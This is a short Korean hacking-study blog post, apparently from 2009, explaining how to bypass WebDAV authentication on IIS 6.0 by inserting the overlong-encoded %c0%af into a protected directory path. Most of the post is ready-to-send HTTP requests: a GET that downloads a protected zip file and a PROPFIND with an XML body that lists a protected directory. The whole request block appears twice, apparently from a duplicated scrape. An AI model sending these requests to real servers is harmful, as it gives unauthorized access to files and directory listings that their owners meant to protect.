IIS 6.0에서 WebDAV로 인증하는 /protected/ 디렉토리에 %c0%af(예: /prot%c0%afected/) 를 넣어서 인증을 우회하는 방법임
GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername
우회 해서 디렉토리 리스트 받아오기
PROPFIND /protec%c0%afted/ HTTP/1.1
Host: servername
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>
실전 동영상 긴급 입수!
P.S 음.. 그런데 WebDAV 만 사용해서 인증하는 경우가 그리 많지는 않을 것 같다 ㅋ
GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername
우회 해서 디렉토리 리스트 받아오기
PROPFIND /protec%c0%afted/ HTTP/1.1
Host: servername
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>
실전 동영상 긴급 입수!
WebDAV 취약점 공격 원본 동영상.flv.001
파일 나누기_합치기 프로그램 FFSJ_Setup.exeP.S 음.. 그런데 WebDAV 만 사용해서 인증하는 경우가 그리 많지는 않을 것 같다 ㅋ
'기타 > 해킹 공부' 카테고리의 다른 글
| GIFAR 만들기 동영상 (0) | 2009.05.19 |
|---|---|
| GIF+PHP 해킹 (0) | 2009.05.19 |
| A textbook example of Blind SQL Injection (0) | 2009.05.18 |
| SecureState SQL Injection Video (0) | 2009.05.18 |
| 기본 Sql Injection 공부 (0) | 2009.04.30 |
